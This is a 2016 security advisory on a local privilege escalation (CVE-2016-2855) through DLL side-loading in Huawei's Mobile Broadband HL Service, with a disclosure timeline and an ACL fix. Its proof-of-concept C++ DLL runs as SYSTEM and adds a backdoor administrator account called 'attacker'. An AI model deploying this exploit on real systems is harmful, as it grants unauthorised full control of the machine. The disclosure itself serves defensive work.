Huawei Mobile Broadband HL Service Local Privilege Escalation Metadata =================================================== Release Date: 12-05-2016 Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc) Affected versions: up to the current 22.001.25.00.03 on x86 and x64 Tested on: Windows 7 32 bit and 64 bit CVE : CVE-2016-2855 URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/ Video: https://youtu.be/MwtjE2PmEJU Vulnerability Status: Fixed Abstract =================================================== The Windows service "Mobile Broadband HL Service" as installed by many? Huawei 3G/LTE modems is vulnerable to a DLL side loading attack allowing normal unprivileged users to gain full SYSTEM access. Disclosure Timeline =================================================== 6.3.2016: Issue privately reported to Huawei 6.3.2016: CVE number requested 7.3.2016: MITRE assigned CVE-2016-2855 14.3.2016: Huawei verified the issue and is working on a fix 9.5.2016: Huawei informed me that the issue has been fixed in their latest release. However it is up to the carriers to push the fix to the devices. Technical Details =================================================== The service executable for the "Mobile Broadband HL Service" service is located in "C:\ProgramData\MobileBrServ". As the file permissions of this folder allow normal users to add files a malicious local attacker can drop a DLL named VERSION.dll into this folder. During the next boot this DLL is loaded and executed as part of the service launch. This causes a Local Privilege Escalation as this service is run as LOCAL SYSTEM. Proof of Concept =================================================== #include /* To compile 32bit dll: cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll Put into C:\ProgramData\MobileBrServ and reboot your system -> a new user will be added */ /* export all required functions - use Dependency Walker to check what is needed */ extern "C" { __declspec(dllexport) int GetFileVersionInfoA(); __declspec(dllexport) int GetFileVersionInfoSizeA(); __declspec(dllexport) int VerQueryValueA(); } /* Implement DLLMain with common datatypes so we don't have to include windows.h. Otherwise this would cause several compile errors because of the already known but reexported functions. */ int DllMain(void* hinst, unsigned long* reason, void* reserved) { system("cmd /c \"echo>%tmp%\\dll_loaded\""); // cmd /c "echo>%tmp%\dll_loaded" system("net user attacker Batman42 /add"); system("net localgroup Administrators attacker /add"); return 0; } /* Implement stubs of our exports */ int GetFileVersionInfoA() { return 0; } int GetFileVersionInfoSizeA() { return 0; } int VerQueryValueA() { return 0; } Suggested Solution =================================================== The correct solution to prevent this attack is so change the filesystem ACLs so that normal users are prohibited from creating files and directories within the C:\ProgramData\MobileBrServ folder. Workaround =================================================== Until Huawei pushes a fix the filesystem ACLs should be updated manually to prevent normal users to write anything into the service directory (C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.